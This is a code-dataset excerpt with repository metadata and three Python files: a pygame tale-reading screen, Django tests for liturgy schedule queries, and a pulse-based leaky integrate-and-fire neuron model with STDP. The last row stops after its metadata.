hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e44fdf74b382389552fc4dda6ec2467a8d9f3acd | 8,335 | py | Python | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | from drawengine import *
import catalog
class Readscreen:
    """Screen that displays a single tale.

    Loads the tale from the local cache (downloading and caching it on a
    miss), paginates text and images to fit the window, and provides page
    navigation, a favourites toggle and a back-to-catalog button.

    Page content is stored as tuples ``(content, (x, y), kind)`` where
    kind 1 = text line and kind 2 = image surface.
    """
    def __init__(self, tale):
        # tale: catalog entry dict; 'title' and 'link' are used here.
        self.window = Singleton.window
        self.parser = Singleton.parser
        self.color = [Color(220, 130, 180), Color(250, 200, 230)]
        self.font = pygame.font.SysFont('Comic Sans MS', 15)
        self.page = 0              # index of the page currently shown
        self.page_label = None     # "current/total" indicator, built in show()
        self.tale = tale
        self.text = self.load_tale()  # cached tale dict, or None on cache miss
        self.toshow = [(self.show, 0.5)]  # deferred UI build: (callback, delay)
        self.labels = []           # Labels belonging to the shown page
        self.favor_button = None   # favourites toggle, built in show()
    def show(self):
        """Build the read screen: download the tale if it is not cached,
        paginate it and create the navigation/favourite buttons."""
        if self.text == None:
            self.show_load()  # not cached yet: fetch, decode and save first
        self.configure_tale()
        # "Back to catalog" button slides in from below the window.
        button = Button(50, self.window.height + 50, width = 100, height = 50, function = self.back)
        button.set_gradient((220, 130, 180), (250, 200, 230), (False, True, True))
        button.set_text('Вернуться', (255, 255, 255), 16)
        button.move(75, self.window.height - 50, 3)
        # Page counter shown between the two arrow buttons.
        self.page_label = Label(self.window.width / 2, self.window.height + 50, width = 50, height = 50)
        self.page_label.fill((0, 0, 0, 0))
        self.page_label.move(self.window.width / 2, self.window.height - 50, 3)
        # Next-page arrow.
        button = Button(self.window.width / 2, self.window.height + 50, width = 100, height = 50, function = self.next)
        button.set_image(pygame.transform.scale(self.window.images['arrow_right'].copy(), (25, 50)))
        button.image.set_alpha(200)
        button.update_image()
        button.move(self.window.width / 2 + 50, self.window.height - 50, 3)
        # Previous-page arrow.
        button = Button(self.window.width / 2, self.window.height + 50, width = 100, height = 50, function = self.prev)
        button.set_image(pygame.transform.scale(self.window.images['arrow_left'].copy(), (25, 50)))
        button.image.set_alpha(200)
        button.update_image()
        button.move(self.window.width / 2 - 50, self.window.height - 50, 3)
        # Favourites toggle; caption and handler are assigned in configure().
        self.favor_button = Button(self.window.width + 50, self.window.height + 50, width = 100, height = 50, function = self.add_favourite)
        self.favor_button.set_gradient((220, 130, 180), (250, 200, 230), (True, True, False))
        self.favor_button.move(self.window.width - 75, self.window.height - 50, 3)
        self.configure()
        self.change_page()
    def add_favourite(self):
        """Add this tale to the favourites list and persist it."""
        self.window.favourite.append(self.tale['title'])
        self.window.save_favourite()
        self.configure()
    def remove_favourite(self):
        """Remove this tale from the favourites list and persist it."""
        self.window.favourite.remove(self.tale['title'])
        self.window.save_favourite()
        self.configure()
    def configure(self):
        """Point the favourite button at the correct caption/action for the
        tale's current favourite status."""
        if self.tale['title'] in self.window.favourite:
            self.favor_button.set_text('Удалить из\nизбранного *', (255, 255, 255), 12)
            self.favor_button.function = self.remove_favourite
        else:
            self.favor_button.set_text('Добавить в\nизбранное *', (255, 255, 255), 12)
            self.favor_button.function = self.add_favourite
    def next(self):
        """Advance one page; no-op when already on the last page."""
        if self.page == len(self.pages) - 1:
            return
        self.page += 1
        self.change_page(-1)
    def prev(self):
        """Go back one page; no-op when already on the first page."""
        if self.page == 0:
            return
        self.page -= 1
        self.change_page(1)
    def back(self):
        """Return to the catalog screen."""
        self.window.change(catalog.Catalog(True))
    def change_page(self, dir = -1):
        """Animate the old page's labels out and the new page's labels in.

        dir is the slide direction (-1 when moving forward, 1 backward).
        """
        for label in self.labels:
            label.remove(label.position.x + self.window.width * dir * 2, label.position.y, 3, True)
        self.page_label.set_text('%i/%i' % (self.page + 1, len(self.pages)), (0, 0, 0), 15)
        for part in self.pages[self.page]:
            # part = (content, (x, y), kind); kind 1 = text, kind 2 = image.
            label = Label(part[1][0] - self.window.width * dir, part[1][1], self.window.width, 30)
            if part[2] == 1:
                label.fill((0, 0, 0, 10))
                # The first part of page 0 is the title: bigger and darker.
                if self.page == 0 and part is self.pages[self.page][0]:
                    label.set_text(part[0], (0, 0, 0), 20)
                else:
                    label.set_text(part[0], (50, 50, 50), 15)
                label.move(part[1][0] - self.window.width / 2 + 30 + label.text_image.get_width() / 2, part[1][1], 3, True)
            elif part[2] == 2:
                label.set_image(part[0])
                label.move(part[1][0], part[1][1], 3, True)
            self.labels.append(label)
    def show_load(self):
        """Show a loading banner while downloading the tale and its images,
        then save everything into the local cache directory."""
        label = Label(self.window.width / 2, -100, width = self.window.width, height = 40)
        label.set_gradient((180, 110, 150), (255, 170, 220), (True, True, True))
        label.set_text('Загружаем сказку', (50, 50, 50), 20)
        label.move(self.window.width / 2, self.window.height / 2, 6, True)
        self.text = self.parser.tale(self.tale['link'])
        self.text['images'] = self.parser.download_images(self.text['image_links'], save_size = True)
        self.parser.save_file(self.text, 'data/saves/' + self.tale['title'])
        label.remove(self.window.width / 2, self.window.height + 100, 3, True)
    def configure_tale(self):
        """Prepare the cached tale for display: decode images, merge adjacent
        text fragments, wrap lines to the window width and split the result
        into pages of (content, position, kind) tuples."""
        # Decode the serialized image bytes and add a decorative frame.
        for i in range(len(self.text['images'])):
            self.text['images'][i] = pygame.image.fromstring(self.text['images'][i][0], self.text['images'][i][1], 'RGB').convert()
            self.text['images'][i] = Utils.add_frame(self.text['images'][i], (160, 110, 250), 20)
        # Merge consecutive non-image fragments into single strings.
        index = 0
        while index < len(self.text['text']) - 1:
            text = self.text['text'][index]
            text1 = self.text['text'][index + 1]
            if text[:4] != 'img_' and text1[:4] != 'img_':
                self.text['text'].pop(index)
                self.text['text'].pop(index)
                self.text['text'].insert(index, text + text1)
            else:
                # NOTE(review): advancing by 2 can skip an unmerged text
                # fragment that directly follows an image — confirm intended.
                index += 2
        # Re-wrap every text fragment to the usable window width.
        _text = []
        for part in self.text['text']:
            if part[:4] == 'img_':
                _text.append(part)
            else:
                for line in part.split('\n'):
                    line = Utils.cut_text(line, self.font, self.window.width - 150, self.window.height - 100, False)
                    for a in line.split('\n'):
                        _text.append(a)
        self.text['text'] = _text
        # Build pages: title (and author, if any) go on top of page 0.
        self.pages = []
        size = self.font.size(self.tale['title'])
        self.pages.append([(self.tale['title'], (self.window.width / 2, 30 + size[1] / 2), 1)])
        y = 30 + size[1] + 10
        if self.text['author'] != None:
            size = self.font.size(self.text['author'])
            self.pages[-1].append((self.text['author'], (self.window.width / 2, y + size[1] / 2), 1))
            y += size[1] + 10
        y += 10
        # Flow parts onto pages; `next` carries a part over to the next page
        # when it does not fit on the current one.
        index, next, height = 0, None, 0
        while True:
            if next == None:
                if index == len(self.text['text']):
                    break
                part = self.text['text'][index]
                index += 1
                if part == '':
                    continue
                if part[:4] == 'img_':
                    part = self.text['images'][int(part[4:])].copy()
                    height = part.get_height()
                else:
                    height = self.font.size(part)[1]
            else:
                part = next
                next = None
            if y + height > self.window.height - 100:
                if type(part) is str:
                    next = part  # text never gets split: push whole line over
                else:
                    h = self.window.height - y - 100
                    if h < 150:
                        next = part  # too little room: move image to next page
                    else:
                        # Enough room: shrink the image to the remaining space.
                        self.pages[-1].append((pygame.transform.scale(part, (int(part.get_width() * h / height), h)), (self.window.width / 2, y + h / 2), 2))
                y = 30
                self.pages.append([])
            else:
                if type(part) is str:
                    self.pages[-1].append((part, (self.window.width / 2, y + height / 2), 1))
                    y += height + 10
                else:
                    self.pages[-1].append((part, (self.window.width / 2, y + height / 2), 2))
                    y += height + 10
    def load_tale(self):
        """Return the locally cached tale dict, or None when there is no
        usable cache (any read/parse error is treated as a cache miss)."""
        try:
            return self.parser.load_file('data/saves/' + self.tale['title'])
        except:
            return None
| 40.658537 | 158 | 0.515537 |
b276463dd64f319b68313ed4b2b003aab2a4747a | 7,631 | py | Python | zsolozsma/tests/test_schedule.py | molnarm/liturgia.tv | 3c78de6dcec65262ae9e272188dbda92f71a7c15 | [
"MIT"
] | 4 | 2020-05-04T10:52:35.000Z | 2020-12-03T22:01:09.000Z | zsolozsma/tests/test_schedule.py | molnarm/liturgia.tv | 3c78de6dcec65262ae9e272188dbda92f71a7c15 | [
"MIT"
] | 27 | 2021-02-18T19:41:24.000Z | 2021-11-23T05:01:00.000Z | zsolozsma/tests/test_schedule.py | molnarm/zsolozsma | a260af574b38687cc5955bbbf76caabc779f09c4 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from django.test import TestCase
from zsolozsma import queries
from zsolozsma.models import *
class ScheduleTests(TestCase):
    """Integration tests for queries.get_schedule().

    setUp builds a fixture of two cities, three locations (two share the
    name 'Church A'), two denominations each owning one liturgy, and one
    EventSchedule per (location, liturgy) pair, scheduled for one hour from
    now on today's weekday.  Each test then exercises one filter or
    scheduling rule and compares (name, city) pairs of the result.
    """
    def setUp(self):
        self.city1 = City.objects.create(name='City 1')
        self.city2 = City.objects.create(name='City 2')
        self.location1 = Location.objects.create(name='Church A',
                                                 city=self.city1)
        self.location2 = Location.objects.create(name='Church B',
                                                 city=self.city1,
                                                 miserend_id=42)
        self.location3 = Location.objects.create(name='Church A',
                                                 city=self.city2)
        self.denomination1 = Denomination.objects.create(name='Denomination 1')
        self.denomination2 = Denomination.objects.create(name='Denomination 2')
        self.liturgy1 = Liturgy.objects.create(name='Liturgy 1',
                                               denomination=self.denomination1)
        self.liturgy2 = Liturgy.objects.create(name='Liturgy 2',
                                               denomination=self.denomination2)
        self.now = datetime.now()
        self.today = self.now.date()
        self.later = (self.now + timedelta(hours=1)).time()  # one hour ahead
        # One event per (location, liturgy) pair, today, one hour from now.
        for location in Location.objects.all():
            for liturgy in Liturgy.objects.all():
                EventSchedule.objects.create(location=location,
                                             liturgy=liturgy,
                                             name=location.name + ' ' +
                                             liturgy.name,
                                             day_of_week=self.today.weekday(),
                                             time=self.later)
    def test_query_city_filter(self):
        # Only events in City 1 are returned.
        schedule = queries.get_schedule(city_slug='city-1')
        self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
                                ('Church A Liturgy 2', 'City 1'),
                                ('Church B Liturgy 1', 'City 1'),
                                ('Church B Liturgy 2', 'City 1')], schedule)
    def test_query_location_filter(self):
        # The location slug matches 'Church A' in both cities.
        schedule = queries.get_schedule(location_slug='church-a')
        self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
                                ('Church A Liturgy 2', 'City 1'),
                                ('Church A Liturgy 1', 'City 2'),
                                ('Church A Liturgy 2', 'City 2')], schedule)
    def test_query_city_location_filter(self):
        # City and location filters combine conjunctively.
        schedule = queries.get_schedule(city_slug='city-1',
                                        location_slug='church-a')
        self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
                                ('Church A Liturgy 2', 'City 1')], schedule)
    def test_query_denomination_filter(self):
        # Denomination 1 owns only Liturgy 1.
        schedule = queries.get_schedule(denomination_slug='denomination-1')
        self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
                                ('Church B Liturgy 1', 'City 1'),
                                ('Church A Liturgy 1', 'City 2')], schedule)
    def test_query_denomination_city_filter(self):
        schedule = queries.get_schedule(denomination_slug='denomination-1',
                                        city_slug='city-2')
        self.__assert_schedule([('Church A Liturgy 1', 'City 2')], schedule)
    def test_liturgy_filter(self):
        schedule = queries.get_schedule(liturgy_slug='liturgy-2')
        self.__assert_schedule([('Church A Liturgy 2', 'City 1'),
                                ('Church B Liturgy 2', 'City 1'),
                                ('Church A Liturgy 2', 'City 2')], schedule)
    def test_miserend_filter(self):
        # Only location2 carries miserend_id=42.
        schedule = queries.get_schedule(miserend_id=42)
        self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
                                ('Church B Liturgy 2', 'City 1')], schedule)
    def test_validity(self):
        # A schedule valid only from tomorrow, and one valid only until
        # yesterday, must both be excluded from today's results.
        schedule11 = EventSchedule.objects.get(location=self.location1,
                                               liturgy=self.liturgy1)
        schedule11.valid_from = self.today + timedelta(days=1)
        schedule11.save()
        schedule12 = EventSchedule.objects.get(location=self.location1,
                                               liturgy=self.liturgy2)
        schedule12.valid_to = self.today + timedelta(days=-1)
        schedule12.save()
        schedule = queries.get_schedule()
        self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
                                ('Church B Liturgy 2', 'City 1'),
                                ('Church A Liturgy 1', 'City 2'),
                                ('Church A Liturgy 2', 'City 2')], schedule)
    def test_is_extraordinary(self):
        # Extraordinary events: only one per location may appear; here the
        # events flagged at location2 are still both listed while location1's
        # ordinary pairing keeps only the non-flagged composition intact.
        schedule11 = EventSchedule.objects.get(location=self.location1,
                                               liturgy=self.liturgy1)
        schedule11.is_extraordinary = True
        schedule11.save()
        schedule21 = EventSchedule.objects.get(location=self.location2,
                                               liturgy=self.liturgy1)
        schedule21.is_extraordinary = True
        schedule21.save()
        schedule22 = EventSchedule.objects.get(location=self.location2,
                                               liturgy=self.liturgy2)
        schedule22.is_extraordinary = True
        schedule22.save()
        schedule = queries.get_schedule()
        self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
                                ('Church B Liturgy 1', 'City 1'),
                                ('Church B Liturgy 2', 'City 1'),
                                ('Church A Liturgy 1', 'City 2'),
                                ('Church A Liturgy 2', 'City 2')], schedule)
    def test_is_active(self):
        # Events at inactive locations are hidden.
        self.location1.is_active = False
        self.location1.save()
        schedule = queries.get_schedule()
        self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
                                ('Church B Liturgy 2', 'City 1'),
                                ('Church A Liturgy 1', 'City 2'),
                                ('Church A Liturgy 2', 'City 2')], schedule)
    def test_duration(self):
        # Duration precedence: event-specific (40) > liturgy default (50)
        # > global default (60).
        self.liturgy1.duration = 50
        self.liturgy1.save()
        event11 = EventSchedule.objects.get(location=self.location1,
                                            liturgy=self.liturgy1)
        event11.duration = 40
        event11.save()
        schedule = queries.get_schedule(city_slug='city-1')
        expected = [('Church A Liturgy 1', 'City 1', 40),
                    ('Church A Liturgy 2', 'City 1', 60),
                    ('Church B Liturgy 1', 'City 1', 50),
                    ('Church B Liturgy 2', 'City 1', 60)]
        for expected_item, actual_item in zip(expected, schedule):
            self.assertEqual(expected_item,
                             (actual_item.name, actual_item.city_name,
                              actual_item.duration))
    def __assert_schedule(self, expected, schedule):
        # expected: ordered list of (event name, city name) tuples.
        self.assertEqual(len(expected), len(schedule))
        for expected_item, actual_item in zip(expected, schedule):
            self.assertEqual(expected_item,
                             (actual_item.name, actual_item.city_name))
| 45.694611 | 80 | 0.507011 |
dc1242f5bc72f70097f500a70a7c0aa092503c2c | 12,177 | py | Python | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | from math import pi, exp,sin
import numpy as np
def inj(t):
    """Injected dendritic current at time t (ms).

    Returns 15 nA (0.000015 mA) during two stimulation windows,
    (250, 750) ms and (3500, 5500) ms, and 0 otherwise.  A sinusoidal
    modulation factor existed previously but is disabled.
    """
    amplitude = 0.000015  # mA
    in_first_window = 250 < t < 750
    in_second_window = 3500 < t < 5500
    if in_first_window or in_second_window:
        return amplitude
    return 0.0
class PBLIF:
    """A Pulse Based Leaky Integrate and Fire model.

    Two-compartment (dendrite + soma) motoneuron integrated with RK4.
    Ion-channel gates are not integrated numerically; each gate follows a
    closed-form exponential between "pulse" state switches (the pulse-based
    formulation).  Synaptic weights evolve with a pair-based STDP rule.
    Units: cm, mV, milliFarad, Ohm^-1, milliAmp, ms.
    """
    def __init__(self):
        # Initial State of variables
        # t, Vd, Vs
        self.t=[0]
        self.V=[[0,0]]
        # Record internal dynamics?  When False only the last sample of each
        # history list is kept (overwritten in place).
        self.record=False
        # default time parameters
        self.dt=0.1 # ms
        self.tstop=2000 #ms
        # Gate variables m,h,n,q
        self.m=[0]
        self.h=[0]
        self.n=[0]
        self.q=[0]
        # Plasticity Weights and parameters (all index-matched with
        # self.connections)
        self.connections = []
        self.delays = []
        self.r0 = [] # Last r0 when switching pulse state
        self.rstate = [] # pulse state of presynapse
        self.weights = []
        self.synSpikeTime= []
        self.xj = [] # Presynaptic trace
        self.yi = [] # Postsynaptic trace
        ### Record weights
        self.recordCon = False
        self.rweights = [[]]
        self.rxj = [[]]
        self.ryi = [[]]
        # List of times where spikes occurred in Soma and Axon
        self.somaSpike = []
        self.axonSpike = []
        self.axonTime = 1.5 # ms
        self.refractoryPeriod = 5 # ms
        self.axonSpikeTime = -self.refractoryPeriod-0.1 # This allows for spikes to occur at the beginning of the simulation
        self.axonRelayed = True # Whether an axonal spike has propagated to the Soma
        ## A connection consists of another PBLIF and a paired weight value
        ## weight is pair based and formulation is based upon work by
        ## https://www.frontiersin.org/articles/10.3389/fnsyn.2016.00038/full
        ## weights and connections are index matched, post-synapse connection
        ## is stored in self.connections, presynaptic neuron is self
        # Ion Currents Over Time
        self.INa=[0]
        self.IKf=[0]
        self.IKs=[0]
        # values for analytical solution to pulse based ODEs
        # (gate values frozen at the last pulse-state switch, see ddt())
        self.t0=0
        self.m0=0
        self.h0=0
        self.n0=0
        self.q0=0
        # Gate pulse parameters (rise/decay rates of the closed-form gates)
        self.AM=22 # ms^-1
        self.BM=13 # ms^-1
        self.AH=0.5 # ms^-1
        self.BH=4 # ms^-1
        self.AN=1.5 # ms^-1
        self.BN=0.1 # ms^-1
        self.AQ=1.5 # ms^-1
        self.BQ=0.025 # ms^-1
        # Physical Dimensions and Measures
        ### Dendrite
        # Radius
        self.rd = 42/2 # (41.5-62.5)/2 um
        self.rd/=10000 # convert to cm
        # Length
        self.ld = 5600 # 5519-6789 um
        self.ld/=10000 # convert to cm
        # Resistance
        self.Rmd = 12000 # 10650-14350 Ohm cm^2
        ### Soma
        # Radius
        self.rs = 78/2 # (77.5-82.5)/2 um
        self.rs/=10000 # convert to cm
        # Length
        self.ls = 80 # 77.5-82.5 um
        self.ls/=10000 # convert to cm
        # Resistance
        self.Rms = 1100 # 1050-1150 Ohm cm^2
        ### Cytoplasm
        # Resistance
        self.Ri = 70 # 70 Ohm cm
        # Conductances (leak terms use cylindrical membrane area 2*pi*r*l)
        ### Dendrite
        self.gld = (2*pi*self.rd*self.ld)/(self.Rmd) # Ohm^-1
        ### Soma
        self.gls = (2*pi*self.rs*self.ls)/(self.Rms) # Ohm^-1
        ### Coupling (series axial resistance of the two half-compartments)
        self.gc = 2/( ((self.Ri*self.ld)/(pi*self.rd**2)) +\
                      ((self.Ri*self.ls)/(pi*self.rs**2)) ) # Ohm^-1
        ### Sodium
        self.gNa = 55 # mS/cm^2
        ### Potassium
        self.gKf = 4 # mS/cm^2
        self.gKs = 16 # mS/cm^2
        #### UNIT SCALING
        ### Sodium
        self.gNa/=10000000 # Ohm^-1/cm^2
        ### Potassium
        self.gKf/=10000000 # Ohm^-1/cm^2
        self.gKs/=10000000 # Ohm^-1/cm^2
        # Synaptic Conductance
        self.gSyn=1/10000000
        # Capacitances
        ### Membrane Capacitance
        self.Cm = 1 # uF/cm^2
        self.Cm/=1e3 # convert to milliFarad
        ### Dendrite Capacitance
        self.Cd = 2*pi*self.rd*self.ld*self.Cm # mF
        ### Soma Capacitance
        self.Cs = 2*pi*self.rs*self.ls*self.Cm # mF
        # Equilibrium Potentials
        ### Leak
        self.El = 0 # mV
        ### Sodium
        self.ENa = 120 #mV
        ### Potassium
        self.EK = -10 #mV
        # Inputs
        ### Injected (callables of time; dendrite gets the default protocol)
        self.Iinj_d = inj
        self.Iinj_s = lambda t: 0
        self.Iinj_a = lambda t: 0
        ### Synaptic
        self.Isyn_d=0
        self.Isyn_s=0
        # Rheo and Threshold
        self.rheo = 4 # 3.5-6.5 nA
        self.rheo/= 1000000 # Convert to milliamp
        # Input resistance seen from the soma (leaks + coupled dendrite leak)
        self.rn = 1/(self.gls + (self.gld * self.gc)/(self.gld + self.gc))
        self.threshold = self.rheo*self.rn # Threshold in mV/cm^2
        ### Pulse state (True while the gates are in their "spike pulse")
        self.pulseState = False
    def ddt(self,slope,t,V):
        """Right-hand side of the two membrane equations.

        slope: which RK4 stage (1-4).  Stateful bookkeeping — spike
        detection, synaptic/STDP updates, axonal stimulation and recording —
        is performed only on stage 1 so it happens once per step.
        t: time (ms).  V: [dendrite voltage, soma voltage] (mV).
        Returns dV/dt as a numpy array [dVd/dt, dVs/dt].
        """
        # V[0] = dendrite voltage
        # V[1] = Soma Voltage
        def changeState():
            # Freeze gate values and toggle the pulse, restarting the
            # closed-form exponentials from (t0, m0, h0, n0, q0).
            self.t0=t
            self.m0=self.m[-1]
            self.h0=self.h[-1]
            self.n0=self.n[-1]
            self.q0=self.q[-1]
            self.pulseState = not self.pulseState
        def gateVal(alpha,beta,v0,pulse):
            # Closed-form gate: decay toward 0 during "pulse", rise toward 1
            # otherwise (m, n, q use not-pulse; h uses pulse, i.e. inverted).
            ret=0;
            if (pulse):
                ret = v0 * exp(-beta*(t - self.t0));
            else:
                ret = 1 + (v0 - 1) * exp(-alpha*(t - self.t0));
            return ret
        if (slope==1):
            # Somatic threshold crossing starts a pulse and logs a spike.
            if (V[1]>self.threshold and not self.pulseState):
                self.somaSpike.append(t)
                changeState()
            # Pulse duration is fixed at 0.6 ms.
            if (self.pulseState):
                if (t-self.t0 > 0.6):
                    changeState()
        m = gateVal(self.AM,self.BM,self.m0,not self.pulseState)
        h = gateVal(self.AH,self.BH,self.h0, self.pulseState)
        n = gateVal(self.AN,self.BN,self.n0,not self.pulseState)
        q = gateVal(self.AQ,self.BQ,self.q0,not self.pulseState)
        # Hodgkin-Huxley-style somatic currents.
        iNa = self.gNa * m**3 * h * (V[1]-self.ENa)
        iKf = self.gKf * n**4 * (V[1]-self.EK)
        iKs = self.gKs * q**2 * (V[1]-self.EK)
        Iion = iNa + iKf + iKs
        if slope == 1:
            # Recompute the dendritic synaptic current and apply STDP once
            # per step, iterating presynaptic sources in self.connections.
            self.Isyn_d = 0
            for idx,syn in enumerate(self.connections):
                r=0
                w=self.weights[idx]
                # Presynaptic soma spikes that have already arrived (after
                # conduction delay) and are at most 20 ms old.
                spikeTimes = [time for time in syn.somaSpike\
                              if time+self.delays[idx]<t\
                              # Spike has been received\
                              and\
                              t-(time+self.delays[idx])<20]
                              # TODO: tweak spike history
                for spikeTime in spikeTimes:
                    ts = spikeTime + self.delays[idx]
                    rs = self.rstate[idx]
                    r0 = self.r0[idx]
                    # Destexhe-style transmitter kinetics: 1 ms square pulse
                    # of transmitter, receptor fraction r relaxes accordingly.
                    Tmax = 1 # mM
                    alpha = 2 # msec^-1 mM^-1
                    beta = 1 # msec^-1
                    if t-ts<1:
                        if not rs:
                            self.r0[idx] = r0*exp(-beta*(t-(ts+1)))
                            self.rstate[idx] = True
                        rinf = (alpha*Tmax)/(alpha*Tmax+beta)
                        taur = 1/(alpha*Tmax+beta)
                        r = rinf + (r0-rinf)*exp(-(t-ts)/taur)
                    else:
                        if rs:
                            rinf = (alpha*Tmax)/(alpha*Tmax+beta)
                            taur = 1/(alpha*Tmax+beta)
                            self.r0[idx] = rinf + (r0-rinf)*exp(-(t-ts)/taur)
                            self.rstate[idx] = False
                        r = r0*exp(-beta*(t-(ts+1)))
                    ### Update weight
                    ya = 1 # Post/After spike
                    yb = -1 # Pre/Before spike
                    Ap = ya*3e-4 # Potentiation
                    Ad = yb*3e-4 # Depression
                    # Implemented As Per Pedrosa V, Clopath C (2017)
                    # xj = prepostout
                    # yi = postpreout
                    newSpike=False
                    lastSpikeTime = self.synSpikeTime[idx]
                    if ts>lastSpikeTime:
                        self.synSpikeTime[idx]=ts
                        newSpike=True
                    # Exponential pre/post traces (tau = 8 ms).
                    self.xj[idx] = self.xj[idx] -\
                                   self.xj[idx]*self.dt/8 +\
                                   self.pulseState*1
                    self.yi[idx] = self.yi[idx] -\
                                   self.yi[idx]*self.dt/8 +\
                                   newSpike*1
                    self.weights[idx] = w + self.xj[idx]*newSpike*Ad \
                                        + self.yi[idx]*self.pulseState*Ap
                    w=self.weights[idx]
                    # Hard bounds: clamp weight to [0, up_bound].
                    up_bound = 2 # Maximum Weight
                    w = w - (w - up_bound)*(w>up_bound) - (w)*(w<0.)
                    self.weights[idx] = w
                #TODO: Make separate dendritic compartments where gSyn[] contains the conductances based on recent spikes presynaptic to them
                # acting as a saturation of neuromodulators, look into literature for limits on such
                self.Isyn_d = self.Isyn_d + w * self.gSyn * r * (V[0]-70)
                # 70 is for excitatory
                # -16 for inhib
            # Check for axon current being greater than threshold:
            # suprathreshold axonal stimulation outside the refractory window
            # produces an axonal spike, which may antidromically invade the
            # soma if the soma itself is past refractoriness.
            if (self.Iinj_a(self.t[-1]) >=1 \
                    and (self.t[-1] - self.axonSpikeTime) > self.refractoryPeriod):
                if (self.t[-1] > (self.axonSpikeTime + self.axonTime)):
                    # Ensure soma spike has occured:
                    if (len(self.somaSpike)>0 \
                            and self.t[-1] > self.somaSpike[-1]+self.refractoryPeriod)\
                            or (len(self.somaSpike)==0):
                        self.somaSpike.append(self.t[-1])
                        self.t0=self.t[-1]
                        self.m0=self.m[-1]
                        self.h0=self.h[-1]
                        self.n0=self.n[-1]
                        self.q0=self.q[-1]
                        self.pulseState = not self.pulseState
                    self.axonSpikeTime = self.t[-1]
                    self.axonRelayed = False
                self.axonSpike.append(self.t[-1])
                # TODO: Make not dependent upon refractory period i.e.
                # iterate all not processed or cancelled spikes
        if (slope==1):
            # m,h,n,q: either append to the histories or overwrite in place.
            if (self.record):
                self.m.append(m)
                self.h.append(h)
                self.n.append(n)
                self.q.append(q)
                # Currents over time
                self.INa.append(iNa)
                self.IKf.append(iKf)
                self.IKs.append(iKs)
            else:
                self.m[-1]=m
                self.h[-1]=h
                self.n[-1]=n
                self.q[-1]=q
        # Cable equations: leak + coupling (+ ionic, injected, synaptic).
        dVdt = np.array([
            (-self.Isyn_d-self.gld*(V[0]-self.El)-self.gc*(V[0]-V[1])+self.Iinj_d(t))/self.Cd,
            (-self.Isyn_s-self.gls*(V[1]-self.El)-self.gc*(V[1]-V[0])-Iion+self.Iinj_s(t))/self.Cs
        ])
        return dVdt
    def rk4Step(self):
        """Advance the state by one dt using classic 4th-order Runge-Kutta.

        Note: ddt() performs side effects (spikes, STDP, recording) only on
        stage 1, so they occur exactly once per step.
        """
        k1 = self.dt * self.ddt(1,self.t[-1], self.V[-1])
        k2 = self.dt * self.ddt(2,self.t[-1] + 0.5 * self.dt, self.V[-1] + 0.5 * k1)
        k3 = self.dt * self.ddt(3,self.t[-1] + 0.5 * self.dt, self.V[-1] + 0.5 * k2)
        k4 = self.dt * self.ddt(4,self.t[-1] + self.dt, self.V[-1] + k3)
        V = self.V[-1] + (1.0 / 6.0)*(k1 + 2 * k2 + 2 * k3 + k4)
        t = self.t[-1] + self.dt
        if (self.record):
            self.V.append(V)
            self.t.append(t)
        else:
            self.V[-1]=V
            self.t[-1]=t
    def connect(self, neuron):
        """Connect axon to dendrite of other neuron.

        NOTE(review): ddt() reads `syn.somaSpike` for entries of
        self.connections, i.e. treats them as *presynaptic* sources of self —
        the opposite of this docstring's direction.  Confirm which neuron is
        meant to be presynaptic.
        """
        self.connections.append(neuron)
        # std dev 0 makes this effectively a fixed 23 ms conduction delay.
        self.delays.append(abs(np.random.normal(23,0)))
        self.weights.append(1)
        self.synSpikeTime.append(0)
        self.xj.append(0)
        self.yi.append(0)
        self.r0.append(0)
        self.rstate.append(True)
| 37.352761 | 141 | 0.45783 |
b788774f6a496165d21613f15abd8bedfa885a4e | 3,776 | py | Python | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
